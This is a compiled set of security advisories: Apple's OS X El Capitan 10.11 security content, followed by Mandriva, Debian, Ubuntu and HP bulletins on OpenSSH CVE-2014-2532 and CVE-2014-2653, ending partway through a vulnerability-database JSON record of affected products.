CFNetwork HTTPProtocol Available for: Mac OS X v10.6.8 and later Impact: A maliciously crafted URL may be able to bypass HSTS and leak sensitive data Description: A URL parsing vulnerability existed in HSTS handling. This issue was addressed through improved URL parsing. CVE-ID CVE-2015-5858 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork HTTPProtocol Available for: Mac OS X v10.6.8 and later Impact: A malicious website may be able to track users in Safari private browsing mode Description: An issue existed in the handling of HSTS state in Safari private browsing mode. This issue was addressed through improved state handling. CVE-ID CVE-2015-5860 : Sam Greenhalgh of RadicalResearch Ltd
CFNetwork Proxies Available for: Mac OS X v10.6.8 and later Impact: Connecting to a malicious web proxy may set malicious cookies for a website Description: An issue existed in the handling of proxy connect responses. This issue was addressed by removing the set-cookie header while parsing the connect response. CVE-ID CVE-2015-5841 : Xiaofeng Zheng of Blue Lotus Team, Tsinghua University
CFNetwork SSL Available for: Mac OS X v10.6.8 and later Impact: An attacker with a privileged network position may intercept SSL/TLS connections Description: A certificate validation issue existed in NSURL when a certificate changed. This issue was addressed through improved certificate validation. CVE-ID CVE-2015-5824 : Timothy J. Wood of The Omni Group
CFNetwork SSL Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to decrypt data protected by SSL Description: There are known attacks on the confidentiality of RC4. An attacker could force the use of RC4, even if the server preferred better ciphers, by blocking TLS 1.0 and higher connections until CFNetwork tried SSL 3.0, which only allows RC4. This issue was addressed by removing the fallback to SSL 3.0.
CoreCrypto Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to determine a private key Description: By observing many signing or decryption attempts, an attacker may have been able to determine the RSA private key. This issue was addressed using improved encryption algorithms.
CoreText Available for: Mac OS X v10.6.8 and later Impact: Processing a maliciously crafted font file may lead to arbitrary code execution Description: A memory corruption issue existed in the processing of font files. This issue was addressed through improved input validation. CVE-ID CVE-2015-5874 : John Villamil (@day6reak), Yahoo Pentest Team
Dev Tools Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in dyld. This was addressed through improved memory handling. CVE-ID CVE-2015-5876 : beist of grayhash
Dev Tools Available for: Mac OS X v10.6.8 and later Impact: An application may be able to bypass code signing Description: An issue existed with validation of the code signature of executables. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5839 : @PanguTeam
Disk Images Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: A memory corruption issue existed in DiskImages. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5847 : Filippo Bigarella, Luca Todesco
dyld Available for: Mac OS X v10.6.8 and later Impact: An application may be able to bypass code signing Description: An issue existed with validation of the code signature of executables. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5839 : TaiG Jailbreak Team
EFI Available for: Mac OS X v10.6.8 and later Impact: A malicious application can prevent some systems from booting Description: An issue existed with the addresses covered by the protected range register. This issue was fixed by changing the protected range. CVE-ID CVE-2015-5900 : Xeno Kovah & Corey Kallenberg from LegbaCore
EFI Available for: Mac OS X v10.6.8 and later Impact: A malicious Apple Ethernet Thunderbolt adapter may be able to affect firmware flashing Description: Apple Ethernet Thunderbolt adapters could modify the host firmware if connected during an EFI update. This issue was addressed by not loading option ROMs during updates. CVE-ID CVE-2015-5914 : Trammell Hudson of Two Sigma Investments and snare
Finder Available for: Mac OS X v10.6.8 and later Impact: The "Secure Empty Trash" feature may not securely delete files placed in the Trash Description: An issue existed in guaranteeing secure deletion of Trash files on some systems, such as those with flash storage. This issue was addressed by removing the "Secure Empty Trash" option. CVE-ID CVE-2015-5901 : Apple
Game Center Available for: Mac OS X v10.6.8 and later Impact: A malicious Game Center application may be able to access a player's email address Description: An issue existed in Game Center in the handling of a player's email. This issue was addressed through improved access restrictions. CVE-ID CVE-2015-5855 : Nasser Alnasser
Heimdal Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to replay Kerberos credentials to the SMB server Description: An authentication issue existed in Kerberos credentials. This issue was addressed through additional validation of credentials using a list of recently seen credentials. CVE-ID CVE-2015-5913 : Tarun Chopra of Microsoft Corporation, U.S. and Yu Fan of Microsoft Corporation, China
ICU Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in ICU Description: Multiple vulnerabilities existed in ICU versions prior to 53.1.0. These issues were addressed by updating ICU to version 55.1. CVE-ID CVE-2014-8146 CVE-2014-8147 CVE-2015-5922
Install Framework Legacy Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to gain root privileges Description: A restriction issue existed in the Install private framework containing a privileged executable. This issue was addressed by removing the executable. CVE-ID CVE-2015-5888 : Apple
Intel Graphics Driver Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in the Intel Graphics Driver. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5830 : Yuki MIZUNO (@mzyy94) CVE-2015-5877 : Camillus Gerard Cai
IOAudioFamily Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed in IOAudioFamily that led to the disclosure of kernel memory content. This issue was addressed by permuting kernel pointers. CVE-ID CVE-2015-5864 : Luca Todesco
IOGraphics Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues existed in the kernel. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5871 : Ilja van Sprundel of IOActive CVE-2015-5872 : Ilja van Sprundel of IOActive CVE-2015-5873 : Ilja van Sprundel of IOActive CVE-2015-5890 : Ilja van Sprundel of IOActive
IOGraphics Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to determine kernel memory layout Description: An issue existed in IOGraphics which could have led to the disclosure of kernel memory layout. This issue was addressed through improved memory management. CVE-ID CVE-2015-5865 : Luca Todesco
IOHIDFamily Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to execute arbitrary code with system privileges Description: Multiple memory corruption issues existed in IOHIDFamily. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5866 : Apple CVE-2015-5867 : moony li of Trend Micro
IOStorageFamily Available for: Mac OS X v10.6.8 and later Impact: A local attacker may be able to read kernel memory Description: A memory initialization issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5863 : Ilja van Sprundel of IOActive
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: Multiple memory corruption issues existed in the Kernel. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5868 : Cererdlong of Alibaba Mobile Security Team CVE-2015-5896 : Maxime Villard of m00nbsd CVE-2015-5903 : CESG
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local process can modify other processes without entitlement checks Description: An issue existed where root processes using the processor_set_tasks API were allowed to retrieve the task ports of other processes. This issue was addressed through additional entitlement checks. CVE-ID CVE-2015-5882 : Pedro Vilaca, working from original research by Ming-chieh Pan and Sung-ting Tsai; Jonathan Levin
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local attacker may control the value of stack cookies Description: Multiple weaknesses existed in the generation of user space stack cookies. These issues were addressed through improved generation of stack cookies. CVE-ID CVE-2013-3951 : Stefan Esser
Kernel Available for: Mac OS X v10.6.8 and later Impact: An attacker may be able to launch denial of service attacks on targeted TCP connections without knowing the correct sequence number Description: An issue existed in xnu's validation of TCP packet headers. This issue was addressed through improved TCP packet header validation. CVE-ID CVE-2015-5879 : Jonathan Looney
Kernel Available for: Mac OS X v10.6.8 and later Impact: An attacker in a local LAN segment may disable IPv6 routing Description: An insufficient validation issue existed in the handling of IPv6 router advertisements that allowed an attacker to set the hop limit to an arbitrary value. This issue was addressed by enforcing a minimum hop limit. CVE-ID CVE-2015-5869 : Dennis Spindel Ljungmark
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed that led to the disclosure of kernel memory layout. This was addressed through improved initialization of kernel memory structures. CVE-ID CVE-2015-5842 : beist of grayhash
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed in debugging interfaces that led to the disclosure of memory content. This issue was addressed by sanitizing output from debugging interfaces. CVE-ID CVE-2015-5870 : Apple
Kernel Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to cause a system denial of service Description: A state management issue existed in debugging functionality. This issue was addressed through improved validation. CVE-ID CVE-2015-5902 : Sergi Alvarez (pancake) of NowSecure Research Team
libc Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2014-8611 : Adrian Chadd and Alfred Perlstein of Norse Corporation
libpthread Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5899 : Lufeng Li of Qihoo 360 Vulcan Team
libxpc Available for: Mac OS X v10.6.8 and later Impact: Many SSH connections could cause a denial of service Description: launchd had no limit on the number of processes that could be started by a network connection. This issue was addressed by limiting the number of SSH processes to 40. CVE-ID CVE-2015-5881 : Apple
Login Window Available for: Mac OS X v10.6.8 and later Impact: The screen lock may not engage after the specified time period Description: An issue existed with captured display locking. The issue was addressed through improved lock handling. CVE-ID CVE-2015-5833 : Carlos Moreira, Rainer Dorau of rainer dorau informationsdesign, Chris Nehren, Kai Takac, Hans Douma, Toni Vaahtera, and an anonymous researcher
lukemftpd Available for: Mac OS X v10.6.8 and later Impact: A remote attacker may be able to deny service to the FTP server Description: A glob-processing issue existed in tnftpd. This issue was addressed through improved glob validation. CVE-ID CVE-2015-5917 : Maksymilian Arciemowicz of cxsecurity.com
Mail Available for: Mac OS X v10.6.8 and later Impact: Printing an email may leak sensitive user information Description: An issue existed in Mail which bypassed user preferences when printing an email. This issue was addressed through improved user preference enforcement. CVE-ID CVE-2015-5881 : Owen DeLong of Akamai Technologies, Noritaka Kamiya, Dennis Klein from Eschenburg, Germany, Jeff Hammett of Systim Technology Partners
Mail Available for: Mac OS X v10.6.8 and later Impact: An attacker in a privileged network position may be able to intercept attachments of S/MIME-encrypted e-mail sent via Mail Drop Description: An issue existed in handling encryption parameters for large email attachments sent via Mail Drop. The issue is addressed by no longer offering Mail Drop when sending an encrypted e-mail. CVE-ID CVE-2015-5884 : John McCombs of Integrated Mapping Ltd
Multipeer Connectivity Available for: Mac OS X v10.6.8 and later Impact: A local attacker may be able to observe unprotected multipeer data Description: An issue existed in convenience initializer handling in which encryption could be actively downgraded to a non-encrypted session. This issue was addressed by changing the convenience initializer to require encryption. CVE-ID CVE-2015-5851 : Alban Diquet (@nabla_c0d3) of Data Theorem
NetworkExtension Available for: Mac OS X v10.6.8 and later Impact: A malicious application may be able to determine kernel memory layout Description: An uninitialized memory issue in the kernel led to the disclosure of kernel memory content. This issue was addressed through improved memory initialization. CVE-ID CVE-2015-5831 : Maxime Villard of m00nbsd
Notes Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to leak sensitive user information Description: An issue existed in parsing links in the Notes application. This issue was addressed through improved input validation. CVE-ID CVE-2015-5878 : Craig Young of Tripwire VERT, an anonymous researcher
Notes Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to leak sensitive user information Description: A cross-site scripting issue existed in parsing text by the Notes application. This issue was addressed through improved input validation. CVE-ID CVE-2015-5875 : xisigr of Tencent's Xuanwu LAB (www.tencent.com)
OpenSSH Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in OpenSSH Description: Multiple vulnerabilities existed in OpenSSH versions prior to 6.9. These issues were addressed by updating OpenSSH to version 6.9. CVE-ID CVE-2014-2532
OpenSSL Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in OpenSSL Description: Multiple vulnerabilities existed in OpenSSL versions prior to 0.9.8zg. These were addressed by updating OpenSSL to version 0.9.8zg. CVE-ID CVE-2015-0286 CVE-2015-0287
procmail Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in procmail Description: Multiple vulnerabilities existed in procmail versions prior to 3.22. These issues were addressed by removing procmail. CVE-ID CVE-2014-3618
remote_cmds Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with root privileges Description: An issue existed in the usage of environment variables by the rsh binary. This issue was addressed by dropping setuid privileges from the rsh binary. CVE-ID CVE-2015-5889 : Philip Pettersson
removefile Available for: Mac OS X v10.6.8 and later Impact: Processing malicious data may lead to unexpected application termination Description: An overflow fault existed in the checkint division routines. This issue was addressed with improved division routines. CVE-ID CVE-2015-5840 : an anonymous researcher
Ruby Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in Ruby Description: Multiple vulnerabilities existed in Ruby versions prior to 2.0.0p645. These were addressed by updating Ruby to version 2.0.0p645. CVE-ID CVE-2014-8080 CVE-2014-8090 CVE-2015-1855
Security Available for: Mac OS X v10.6.8 and later Impact: The lock state of the keychain may be incorrectly displayed to the user Description: A state management issue existed in the way keychain lock status was tracked. This issue was addressed through improved state management. CVE-ID CVE-2015-5915 : Peter Walz of University of Minnesota, David Ephron, Eric E. Lawrence, Apple
Security Available for: Mac OS X v10.6.8 and later Impact: A trust evaluation configured to require revocation checking may succeed even if revocation checking fails Description: The kSecRevocationRequirePositiveResponse flag was specified but not implemented. This issue was addressed by implementing the flag. CVE-ID CVE-2015-5894 : Hannes Oud of kWallet GmbH
Security Available for: Mac OS X v10.6.8 and later Impact: A remote server may prompt for a certificate before identifying itself Description: Secure Transport accepted the CertificateRequest message before the ServerKeyExchange message. This issue was addressed by requiring the ServerKeyExchange first. CVE-ID CVE-2015-5887 : Benjamin Beurdouche, Karthikeyan Bhargavan, Antoine Delignat-Lavaud, Alfredo Pironti, and Jean Karim Zinzindohoue of INRIA Paris-Rocquencourt, and Cedric Fournet and Markulf Kohlweiss of Microsoft Research, Pierre-Yves Strub of IMDEA Software Institute
SMB Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to execute arbitrary code with kernel privileges Description: A memory corruption issue existed in the kernel. This issue was addressed through improved memory handling. CVE-ID CVE-2015-5891 : Ilja van Sprundel of IOActive
SMB Available for: Mac OS X v10.6.8 and later Impact: A local user may be able to determine kernel memory layout Description: An issue existed in SMBClient that led to the disclosure of kernel memory content. This issue was addressed through improved bounds checking. CVE-ID CVE-2015-5893 : Ilja van Sprundel of IOActive
SQLite Available for: Mac OS X v10.6.8 and later Impact: Multiple vulnerabilities in SQLite v3.8.5 Description: Multiple vulnerabilities existed in SQLite v3.8.5. These issues were addressed by updating SQLite to version 3.8.10.2. CVE-ID CVE-2015-3414 CVE-2015-3415 CVE-2015-3416
Telephony Available for: Mac OS X v10.6.8 and later Impact: A local attacker can place phone calls without the user's knowledge when using Continuity Description: An issue existed in the authorization checks for placing phone calls. This issue was addressed through improved authorization checks. CVE-ID CVE-2015-3785 : Dan Bastone of Gotham Digital Science
Terminal Available for: Mac OS X v10.6.8 and later Impact: Maliciously crafted text could mislead the user in Terminal Description: Terminal did not handle bidirectional override characters in the same way when displaying text and when selecting text. This issue was addressed by suppressing bidirectional override characters in Terminal. CVE-ID CVE-2015-5883 : an anonymous researcher
tidy Available for: Mac OS X v10.6.8 and later Impact: Visiting a maliciously crafted website may lead to arbitrary code execution Description: Multiple memory corruption issues existed in tidy. These issues were addressed through improved memory handling. CVE-ID CVE-2015-5522 : Fernando Munoz of NULLGroup.com CVE-2015-5523 : Fernando Munoz of NULLGroup.com
Time Machine Available for: Mac OS X v10.6.8 and later Impact: A local attacker may gain access to keychain items Description: An issue existed in backups by the Time Machine framework. This issue was addressed through improved coverage of Time Machine backups. CVE-ID CVE-2015-5854 : Jonas Magazinius of Assured AB
Note: OS X El Capitan 10.11 includes the security content of Safari 9: https://support.apple.com/kb/HT205265.
OS X El Capitan 10.11 may be obtained from the Mac App Store: http://www.apple.com/support/downloads/
Information will also be posted to the Apple Security Updates web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key, and details are available at: https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE----- Comment: GPGTools - http://gpgtools.org
iQIcBAEBCAAGBQJWDB2wAAoJEBcWfLTuOo7t0sYP/2L3JOGPkHH8XUh2YHpu5qaw S5F2v+SRpWleKQBVsGZ7oA8PV0rBTzEkzt8K1tNxYmxEqL9f/TpRiGoforn89thO /hOtmVOfUcBjPZ4XKwMVzycfSMC9o6LxWTLEKDVylE+F+5jkXafOC9QaqD11dxX6 QhENkpS1BwrKhyaSVxEcgBQtZM9aTsVdZ78rTCb9XTn6gDnvs8NfIQquFOnaQT54 YJ36e5UcUsnyBIol+yGDbC3ZEhzSVIGE5/8/NFlFfRXLgnJArxD8lqz8WdfU9fop hpT/dDqqAdYbRcW1ihcG1haiNHgP9yQCY5jRNfttb+Tc/kIi/QmPkEO0QS8Ygt/O c3sUbNulr1LCinymFVwx16CM1DplGS/GmBL18BAEBnL6yi9tEhYDynZWLSEa37VR 8q802rXRSF10Wct9/kEeR4HgY/1k0KK/4Uddm3c0YyOU21ya7NAhoHGwmDa9g11r N1TniOK8tPiCGjRNOJwuF6DKxD9L3Fv44bVlxAarGUGYkICqzaNS+bgKI1aQNahT fJ91x5uKD4+L9v9c5slkoDIvWqIhO9oyuxgnmC5GstkwFplFXSOklLkTktjLGNn1 nJq8cPnZ/3E1RXTEwVhGljYw5pdZHNx98XmLomGrPqVlZfjGURK+5AXdf2pOlt2e g6jld/w5tPuCFhGucE7Z =XciV -----END PGP SIGNATURE----- .
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2532 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2653 http://advisories.mageia.org/MGASA-2014-0143.html http://advisories.mageia.org/MGASA-2014-0166.html
Updated Packages:
Mandriva Business Server 1/X86_64: 753bd40deb60429adc6a7c1afd63ee3d mbs1/x86_64/openssh-5.9p1-6.3.mbs1.x86_64.rpm 377e7fbb14f72a1e32da41f19be7baa8 mbs1/x86_64/openssh-askpass-5.9p1-6.3.mbs1.x86_64.rpm a906db623fc8d56eab9b8b99b1af84d9 mbs1/x86_64/openssh-askpass-common-5.9p1-6.3.mbs1.x86_64.rpm 9fc03d4929efdf21a26aef308eb66f14 mbs1/x86_64/openssh-askpass-gnome-5.9p1-6.3.mbs1.x86_64.rpm f2dbea4a0a8109bc835c69e871f07a69 mbs1/x86_64/openssh-clients-5.9p1-6.3.mbs1.x86_64.rpm a20d329b8332ff7f7f10dd541a3865a9 mbs1/x86_64/openssh-server-5.9p1-6.3.mbs1.x86_64.rpm 0fd2c0a9338a7e8e8747c2ea3ae43c49 mbs1/SRPMS/openssh-5.9p1-6.3.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. The Common Vulnerabilities and Exposures project identifies the following problems:
CVE-2014-2532
Jann Horn discovered that OpenSSH incorrectly handled wildcards in
AcceptEnv lines.
CVE-2014-2653
Matthew Vernon reported that if a SSH server offers a
HostCertificate that the ssh client doesn't accept, then the client
doesn't check the DNS for SSHFP records. As a consequence a
malicious server can disable SSHFP-checking by presenting a
certificate.
Note that a host verification prompt is still displayed before
connecting.
For the oldstable distribution (squeeze), these problems have been fixed in version 1:5.5p1-6+squeeze5.
For the stable distribution (wheezy), these problems have been fixed in version 1:6.0p1-4+deb7u1.
For the unstable distribution (sid), these problems have been fixed in version 1:6.6p1-1.
We recommend that you upgrade your openssh packages. ============================================================================ Ubuntu Security Notice USN-2155-1 March 25, 2014
openssh vulnerability
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 13.10
- Ubuntu 12.10
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
OpenSSH incorrectly handled environment restrictions with wildcards.
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 13.10: openssh-server 1:6.2p2-6ubuntu0.2
Ubuntu 12.10: openssh-server 1:6.0p1-3ubuntu1.1
Ubuntu 12.04 LTS: openssh-server 1:5.9p1-5ubuntu1.2
Ubuntu 10.04 LTS: openssh-server 1:5.3p1-3ubuntu7.1
In general, a standard system update will make all the necessary changes. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04499681
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04499681 Version: 1
HPSBUX03188 SSRT101487 rev.1 - HP-UX running HP Secure Shell, Remote Denial of Service (DoS) and other Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-11-07 Last Updated: 2014-11-07
Potential Security Impact: Remote Denial of Service (DoS) and other vulnerabilities
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP-UX running HP Secure Shell. These vulnerabilities could be exploited remotely to create a Denial of Service (DoS) and other vulnerabilities.
References:
CVE-2013-4548 - remote Permissions, Privileges, and Access Control (CWE-264)
CVE-2014-1692 - remote Denial of Service (DoS), Buffer Errors (CWE-119)
CVE-2014-2532 - remote Permissions, Privileges, and Access Control (CWE-264)
CVE-2014-2653 - remote Input Validation (CWE-20)
SSRT101487
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP-UX B.11.11 running HP Secure Shell before version A.06.20.010
HP-UX B.11.23 running HP Secure Shell before version A.06.20.011
HP-UX B.11.31 running HP Secure Shell before version A.06.20.012
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2013-4548 (AV:N/AC:M/Au:S/C:P/I:P/A:P) 6.0 CVE-2014-1692 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2014-2532 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 CVE-2014-2653 (AV:N/AC:M/Au:N/C:P/I:P/A:N) 5.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following software updates to resolve this vulnerability. The updates are available for download from: http://h20293.www2.hp.com/portal/swdepot/displayProductInfo.do?productNumber= T1471AA
OS Release HP Secure Shell Version Depot Name
HP-UX B.11.11 (11i v1) A.06.20.010 or subsequent HP_UX_11i_v1_T1471AA_A.06.20.010_HP-UX_B.11.11_32_64.depot
HP-UX B.11.23 (11i v2) A.06.20.011 or subsequent HP_UX_11i_v2_T1471AA_A.06.20.011_HP-UX_B.11.23_IA_PA.depot
HP-UX B.11.31 (11i v3) A.06.20.012 or subsequent HP_UX_11i_v3_SecureShell_A.06.20.012_HP-UX_B.11.31_IA_PA.depot
MANUAL ACTIONS: Yes - Update
PRODUCT SPECIFIC INFORMATION
HP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It analyzes all HP-issued Security Bulletins and lists recommended actions that may apply to a specific HP-UX system. It can also download patches and create a depot automatically. For more information see: https://www.hp.com/go/swa
AFFECTED VERSIONS
HP-UX B.11.11
Secure_Shell.SECURE_SHELL action: install revision A.06.20.010 or subsequent
HP-UX B.11.23
Secure_Shell.SECSH-CMN Secure_Shell.SECURE_SHELL action: install revision A.06.20.011 or subsequent
HP-UX B.11.31
Secure_Shell.SECSH-CMN Secure_Shell.SECURE_SHELL action: install revision A.06.20.012 or subsequent
END AFFECTED VERSIONS
HISTORY: Version:1 (rev.1) - 7 November 2014 Initial Release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy.
Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com.
Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com
Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins
Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/
Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB.
3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX
Copyright 2014 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits; damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201403-0275",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "communications user data repository",
"scope": "eq",
"trust": 1.9,
"vendor": "oracle",
"version": "10.0.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.3"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.2"
},
{
"model": "openssh",
"scope": "lte",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.5"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.0"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.1"
},
{
"model": "openssh",
"scope": "eq",
"trust": 1.0,
"vendor": "openbsd",
"version": "6.4"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2"
},
{
"model": "big-ip wom hf3",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.1"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.4.1"
},
{
"model": "openssh",
"scope": "ne",
"trust": 0.3,
"vendor": "openssh",
"version": "6.6"
},
{
"model": "big-ip aam",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5"
},
{
"model": "enterprise linux server",
"scope": "eq",
"trust": 0.3,
"vendor": "redhat",
"version": "6"
},
{
"model": "big-ip afm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.5.1"
},
{
"model": "big-ip gtm hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "big-ip apm hf5",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "5.0p1",
"scope": null,
"trust": 0.3,
"vendor": "openssh",
"version": null
},
{
"model": "big-ip psm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.4"
},
{
"model": "big-ip link controller",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3"
},
{
"model": "big-ip webaccelerator hf7",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.1.0"
},
{
"model": "big-ip gtm hf4",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "mac os",
"scope": "eq",
"trust": 0.3,
"vendor": "apple",
"version": "x10.7"
},
{
"model": "big-ip wom",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.0"
},
{
"model": "big-ip link controller hf2",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.2.0"
},
{
"model": "big-ip asm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "11.3.0"
},
{
"model": "virtual i/o server",
"scope": "eq",
"trust": 0.3,
"vendor": "ibm",
"version": "2.2.1.8"
},
{
"model": "big-ip ltm",
"scope": "eq",
"trust": 0.3,
"vendor": "f5",
"version": "10.2.1"
},
{
"model": "big-ip psm",
"scope": "eq",
